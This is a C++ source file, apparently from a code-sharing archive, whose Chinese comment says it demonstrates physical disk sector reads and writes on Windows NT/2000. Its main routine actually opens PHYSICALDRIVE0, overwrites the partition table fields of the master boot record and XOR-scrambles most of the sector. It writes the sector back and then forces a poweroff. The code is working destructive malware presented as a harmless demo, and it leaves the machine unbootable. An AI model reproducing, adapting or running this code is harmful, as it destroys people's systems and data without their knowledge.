www.pudn.com > NT_LOG_DISK.rar > NT_LOG_DISK.cpp
// NT_LOG_DISK.cpp : Defines the entry point for the console application. // #include "stdafx.h" #include#include //演示如何在Windows NT/2000下对硬盘物理扇区读写 //--------------------------------------------------------------------------- void WINAPI ExitWin() { HANDLE hProcess, hToken; TOKEN_PRIVILEGES NewState; DWORD ProcessId, ReturnLength = 0; LUID luidPrivilegeLUID; ProcessId = GetCurrentProcessId(); hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId); OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES, &hToken); LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &luidPrivilegeLUID); NewState.PrivilegeCount = 1; NewState.Privileges[0].Luid = luidPrivilegeLUID; NewState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if(AdjustTokenPrivileges(hToken, FALSE, &NewState, NULL, NULL, NULL)) ExitWindowsEx(EWX_FORCE|EWX_POWEROFF, 0); } void WINAPI KillNT() { HANDLE hDevice; TCHAR szDevicename[64]; LPTSTR szBuff; DISK_GEOMETRY Geometry; BOOL bRet; DWORD bytes,bread,count; int i; char *drive = "0"; wsprintf(szDevicename,"\\\\.\\PHYSICALDRIVE%c",*drive); hDevice = CreateFile( szDevicename, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL ); if (hDevice == INVALID_HANDLE_VALUE) { MessageBox(NULL,"打开设备出错",NULL,MB_OK); ExitProcess(0); } DeviceIoControl(hDevice,FSCTL_LOCK_VOLUME, NULL,0,NULL,0,&count,NULL); DeviceIoControl(hDevice,IOCTL_DISK_GET_DRIVE_GEOMETRY,NULL,0,&Geometry, sizeof(DISK_GEOMETRY),&count,NULL); szBuff = (LPSTR)HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,Geometry.BytesPerSector); if ( szBuff == NULL) { MessageBox(NULL,"分配内存出错",NULL,MB_OK); ExitProcess(0); } bytes = 512; bRet = ReadFile(hDevice, szBuff, bytes, &bread, NULL); if (bRet==FALSE || bread<512) { MessageBox(NULL,"读MBR出错",NULL,MB_OK); ExitProcess(0); } *(szBuff + 0x1be) =(char) 0x80; *(szBuff + 0x1bf) = 0x00; *(szBuff + 0x1c2) = 0x05; for ( i = 0x1c3; i < 510; i++ ) { *(szBuff + i) ^= 0x926; //XOR } DeviceIoControl(hDevice,FSCTL_UNLOCK_VOLUME, NULL,0,NULL,0,&count,NULL); CloseHandle(hDevice); wsprintf(szDevicename,"\\\\.\\PHYSICALDRIVE%c",*drive); hDevice = CreateFile( szDevicename, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL ); if ( hDevice == INVALID_HANDLE_VALUE) { MessageBox(NULL,"打开设备出错",NULL,MB_OK); ExitProcess(0); } DeviceIoControl(hDevice,FSCTL_LOCK_VOLUME, NULL,0,NULL,0,&count,NULL); DeviceIoControl(hDevice,IOCTL_DISK_GET_DRIVE_GEOMETRY,NULL,0,&Geometry, sizeof(DISK_GEOMETRY),&count,NULL); bRet = WriteFile(hDevice,szBuff,bytes,&bread,NULL); if (bRet==FALSE || bread<512) { MessageBox(NULL,"写MBR出错",NULL,MB_OK); ExitProcess(0); } DeviceIoControl(hDevice,FSCTL_UNLOCK_VOLUME, NULL,0,NULL,0,&count,NULL); HeapFree(GetProcessHeap(),HEAP_NO_SERIALIZE,szBuff); CloseHandle(hDevice); ExitWin(); } void WINAPI OSVer() { OSVERSIONINFO osi; osi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); if (GetVersionEx(&osi)) { if ( osi.dwPlatformId == VER_PLATFORM_WIN32_NT) KillNT(); } } /*int WriteToLog(char* str) { FILE* log; log = fopen(LOGFILE, "a+"); if(log == NULL) { log = fopen(LOGFILE, "w"); if(log == NULL) return -1; } fprintf(log, "%s", str); fclose(log); return 0; } */ int main(int argc, char* argv[]) { OSVer(); printf("\n"); return 0; }